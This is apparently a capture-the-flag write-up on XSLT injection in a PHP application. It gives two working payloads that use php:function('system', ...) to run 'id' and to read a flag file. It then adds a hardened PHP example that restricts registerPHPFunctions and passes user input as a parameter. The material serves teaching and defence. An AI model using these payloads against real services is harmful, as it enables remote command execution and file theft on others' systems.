Exploiting XSLT Injection

Exploit the XSLT Injection vulnerability to obtain RCE and read the flag.

To explore this XSLT vulnerability, let's first try a simple payload to see whether the command gets executed:

<xsl:value-of select="php:function('system','id')" />

And it worked!

After looking around with the ls command, we finally managed to get the flag with the following payload:

<xsl:value-of select="php:function('system','cat ../../../../flag.txt')" />
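
Both payloads depend on the PHP application having enabled PHP function calls from XSLT with XSLTProcessor::registerPHPFunctions() and on user input reaching the stylesheet itself. The following is an added example, not part of the original writeup, showing the hardened form of such a transform; the stylesheet, the render() function and the sample input are assumptions made for illustration.

```php
<?php
// Added example, not from the original writeup. Names and sample data are constructed.
// Assumption: the vulnerable application built its stylesheet from user input and
// called registerPHPFunctions() with no arguments, exposing every PHP function.

// Fixed, server-side stylesheet: user input never becomes XSLT markup.
const STYLESHEET = <<<'XSL'
<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:php="http://php.net/xsl">
  <xsl:output method="text"/>
  <xsl:param name="name"/>
  <xsl:template match="/">
    <xsl:text>Hello </xsl:text>
    <xsl:value-of select="php:function('strtoupper', string($name))"/>
  </xsl:template>
</xsl:stylesheet>
XSL;

function render(string $userInput): string
{
    $xml = new DOMDocument();
    $xml->loadXML('<doc/>'); // constructed sample document

    $xsl = new DOMDocument();
    $xsl->loadXML(STYLESHEET);

    $proc = new XSLTProcessor();
    // Weak setting (left commented out): exposes every PHP function to XSLT.
    // $proc->registerPHPFunctions();
    // Hardened: allow only what the stylesheet needs, or omit the call entirely.
    $proc->registerPHPFunctions(['strtoupper']);
    $proc->importStylesheet($xsl);

    // User input travels as a parameter value (data), not as stylesheet text.
    $proc->setParameter('', 'name', $userInput);

    return (string) $proc->transformToXml($xml);
}

// Constructed input: the select expression from the writeup, now treated as a plain
// string. It is uppercased and printed, never evaluated as XPath.
echo render("php:function('system','id')"), "\n";
```

PHP releases before 8.4 reject setParameter() values that contain both single and double quotes, so validate or normalise input before passing it in.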
